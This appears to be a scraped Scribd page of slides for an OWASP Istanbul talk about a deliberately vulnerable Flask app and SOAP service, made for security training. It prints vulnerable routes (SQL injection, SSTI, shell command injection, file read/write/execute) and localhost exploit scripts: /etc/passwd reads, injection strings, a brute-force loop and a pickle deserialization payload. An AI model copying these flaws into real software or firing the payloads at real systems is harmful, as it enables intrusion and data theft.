Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
507 views34 pages

OWASP - Vulnerable Flask App

The document describes various vulnerabilities in OWASP Vulnerable Flask App and Vulnerable Soap Service projects including SQL injection, SSTI, command injection, information disclosure, LFI, brute force attacks, deserialization, and more. Example code is provided to demonstrate how each vulnerability can be exploited. The end also lists social media accounts for the company Kale İleri Teknoloji and the author Anil Yelken.

Uploaded by

subramanya sai B
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
507 views34 pages

OWASP - Vulnerable Flask App

The document describes various vulnerabilities in OWASP Vulnerable Flask App and Vulnerable Soap Service projects including SQL injection, SSTI, command injection, information disclosure, LFI, brute force attacks, deserialization, and more. Example code is provided to demonstrate how each vulnerability can be exploited. The end also lists social media accounts for the company Kale İleri Teknoloji and the author Anil Yelken.

Uploaded by

subramanya sai B
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 34

OWASP – Vulnerable Flask App

https://owasp.org/www-project-vulnerable-flask-app/

https://github.com/anil-yelken/Vulnerable-Flask-App

Anıl Yelken 19.11.2022 OWASP İstanbul


OWASP – VULNERABLE FLASK APP
-HTML Injection
-SSTI
-SQL Injection
-Information Disclosure
-Command Injection
-Brute Force
-Deserialization
-Broken Authentication
-DOS
-File Upload
OWASP – VULNERABLE FLASK APP
SQL INJECTION
@app.route("/user/<string:name>")
def search_user(name):
con = sqlite3.connect("test.db")
cur = con.cursor()
cur.execute("select * from test where username = '%s'" % name)
data = str(cur.fetchall())
con.close()
import logging
logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG)
logging.debug(data)
return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP
SQL INJECTION
OWASP – VULNERABLE FLASK APP
HTML INJECTION
@app.route("/welcome2/<string:name>")
def welcome2(name):
data="Welcome "+name
return data
OWASP – VULNERABLE FLASK APP
HTML INJECTION
OWASP – VULNERABLE FLASK APP
SSTI
@app.route("/hello")
def hello_ssti():
if request.args.get('name'):
name = request.args.get('name')
template = f'''<div>
<h1>Hello</h1>
{name}
</div>
'''
import logging
logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG)
logging.debug(str(template))
return render_template_string(template)
OWASP – VULNERABLE FLASK APP
SSTI
OWASP – VULNERABLE FLASK APP
COMMAND INJECTION
@app.route("/get_users")
def get_users():
try:
hostname = request.args.get('hostname')
command = "dig " + hostname
data = subprocess.check_output(command, shell=True)
return data
except:
data = str(hostname) + " username didn't found"
return data
OWASP – VULNERABLE FLASK APP
COMMAND INJECTION
OWASP – VULNERABLE FLASK APP
INFORMATION DISCLOSURE
@app.route("/get_log/")
def get_log():
try:
command="cat restapi.log"
data=subprocess.check_output(command,shell=True)
return data
except:
return jsonify(data="Command didn't run"), 200
OWASP – VULNERABLE FLASK APP
INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP
LFI
@app.route("/read_file")
def read_file():
filename = request.args.get('filename')
file = open(filename, "r")
data = file.read()
file.close()
import logging
logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG)
logging.debug(str(data))
return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP
LFI
OWASP – VULNERABLE FLASK APP
INFORMATION DISCLOSURE
@app.route("/get_admin_mail/<string:control>")
def get_admin_mail(control):
if control=="admin":
data="[email protected]"
import logging
logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG)
logging.debug(data)
return jsonify(data=data),200
else:
return jsonify(data="Control didn't set admin"), 200
OWASP – VULNERABLE FLASK APP
INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP
BRUTE FORCE
@app.route('/login',methods=["GET"])
def login():
username=request.args.get("username")
passwd=request.args.get("password")
if "anil" in username and "cyber" in passwd:
return jsonify(data="Login successful"), 200
else:
return jsonify(data="Login unsuccessful"), 403
OWASP – VULNERABLE FLASK APP
BRUTE FORCE
OWASP – VULNERABLE FLASK APP
@app.route('/upload', methods = ['GET','POST'])
FILE UPLOAD
def uploadfile():
import os
if request.method == 'POST':
f = request.files['file']
filename=secure_filename(f.filename)
f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return 'File uploaded successfully'
else:
return '''
<html>
<body>
<form method = "POST" enctype = "multipart/form-data">
<input type = "file" name = "file" />
<input type = "submit"/>
</form>
</body>
</html>
'''
OWASP – VULNERABLE FLASK APP
FILE UPLOAD
OWASP – VULNERABLE FLASK APP
DOS
@app.route("/user_pass_control")
def user_pass_control():
import re
username=request.form.get("username")
password=request.form.get("password")
if re.search(username,password):
return jsonify(data="Password include username"), 200
else:
return jsonify(data="Password doesn't include username"), 200
OWASP – VULNERABLE FLASK APP
DOS
OWASP – VULNERABLE FLASK APP
@app.route("/run_file")
def run_file():
try:
filename=request.args.get("filename")
command="/bin/bash "+filename
data=subprocess.check_output(command,shell=True)
return data
except:
return jsonify(data="File failed to run"), 200
OWASP – VULNERABLE FLASK APP
@app.route("/create_file")
def create_file():
try:
filename=request.args.get("filename")
text=request.args.get("text")
file=open(filename,"w")
file.write(text)
file.close()
return jsonify(data="File created"), 200
except:
return jsonify(data="File didn't create"), 200
OWASP – VULNERABLE FLASK APP
VULNERABLE SOAP SERVICE
https://github.com/anil-yelken/Vulnerable-Soap-Service

-LFI
-SQL Injection
-Information Disclosure
-Command Injection
-Brute Force
-Deserialization
VULNERABLE SOAP SERVICE
LFI
from suds.client import Client
client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.read_file("/etc/passwd"))
VULNERABLE SOAP SERVICE
SQL INJECTION
from suds.client import Client
client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.query("' or '1=1"))
VULNERABLE SOAP SERVICE
INFORMATION DISCLOSURE
from suds.client import Client
client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.get_log())
VULNERABLE SOAP SERVICE
COMMAND INJECTION
from suds.client import Client
client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.get_users("kali /etc/passwd ; id
VULNERABLE SOAP SERVICE
BRUTE FORCE

from suds.client import Client


client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
username_list=["admin","test","siber","siber1"]
for username in username_list:
print(client.service.query(username))
VULNERABLE SOAP SERVICE
DESERIALIZATION
import socket,pickle,builtins
HOST = "127.0.0.1"
PORT = 8001
class Pickle(object):
def __reduce__(self):
return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((HOST,PORT))
sock.sendall(pickle.dumps(Pickle()))

from suds.client import Client


client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.deserialization())
ŞIRKET SOSYAL MEDYA HESAPLARI

• https://kaleileriteknoloji.medium.com/
https://www.linkedin.com/company/54162391
https://twitter.com/kaleileri
https://twitter.com/kaleakademi
https://www.instagram.com/kaleileri/
https://www.instagram.com/kalesiberakademi
https://github.com/kaleakademi
https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
KIŞISEL SOSYAL MEDYA
HESAPLARIM
• https://www.linkedin.com/in/ayelk/
• https://twitter.com/anilyelken06
• https://medium.com/@anilyelken
• https://github.com/anil-yelken

You might also like